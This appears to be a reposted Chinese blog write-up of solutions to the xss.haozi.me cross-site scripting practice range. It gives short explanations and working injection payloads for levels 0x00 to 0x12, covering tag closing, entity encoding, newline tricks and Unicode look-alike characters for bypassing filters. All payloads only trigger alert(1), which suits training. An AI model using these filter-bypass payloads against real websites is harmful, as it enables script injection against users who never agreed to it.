xss.haozi.me靶场练习

科海拾零 / 2023-09-01 / 原文

题目来源：https://xss.haozi.me/

0x00

<script></script>中为可执行的JavaScript语句

<script>alert('1')</script>

0x01

用</textarea>闭合左边的<textarea>，右边的</textarea>注释掉

</textarea><script>alert('1')</script><!--

0x02

用">闭合左边的input，右边的">注释掉

"><script>alert('1')</script><!--

0x03

()被去掉，改为用"`"

<script>alert`1`</script>;

0x04

用 ASCII 编码代替字符

<body onload="alert&#40'1'&#41">

onload：在网页全部加载完成后执行脚本

0x05

两边均注释掉

--!> <script>alert('1')</script><!--

0x06

用换行防止onemouseover=被替换成__，需要用鼠标触发

onmouseover
="alert(1)"

0x07

<body onload="alert(1)"

0x08

闭合前面的<style>，执行了alert(1)即可。

</style > <script>alert(1)</script>

0x09

https://www.segmentfault.com" onerror="alert(1)

0x0A

...

0x0B

<script src="https://xss.haozi.me/j.js"></script>

0x0C

<sscriptcript src="https://xss.haozi.me/j.js"></sscriptcript>

0x0D

换行躲避单行注释，并注释掉右括号


alert('1')
-->

0x0E

<ſcript src="https://xss.haozi.me/j.js"></script>

0x0F

');alert('1

0x10

"";alert(1)

0x11

");alert('1')("

0x12

\");alert(1);//

xss.haozi.me靶场练习更多相关文章

AJAX & AXIOS-2024/11/1

验证码处理在自动化测试中的应用

Java，启动！

2024/11/1日日志关于JavaScript简介&引入方式以及基础语法的学习

android 13 更改手机信号调整

BFS(Breath First Search 广度优先搜索)

华为云开源项目Sermant正式成为CNCF官方项目

spring-boot-configuration-processor无法生效

给网站添加春节灯笼效果：引入即用，附源码！

如何在鲲鹏平台上快速上手应用开发？鲲鹏DevKit给你答案

程序员的修炼之路

Java-中文官方教程-2022-版-一-

Java-中文官方教程-2022-版-五-

Java-中文官方教程-2022-版-四-

Java-中文官方教程-2022-版-六-

随机推荐

NOIP2024模拟赛20 & 11.1 小记

20241101 数据结构与算法期中机试收获

Java，启动！

什么是IT技术

即将到来！

2024/11/1日日志关于JavaScript简介&引入方式以及基础语法的学习

舍得-时间-工作是人的一生最重要的事情-自己要有私房钱-人的一生最重要的事情是书写自己的人生

2.TiUP 部署 DM 集群

原型模式的C++实现

python bytecode解析

09-XSS键盘监听、cookie窃取&文件上传绕过

ubuntu 24.04 部署 mysql 8.4.3 LTS

国标GB28181公网平台LiteGBS国标GB28181视频平台建筑工地无线视频联网监控系统方案

imes完工下线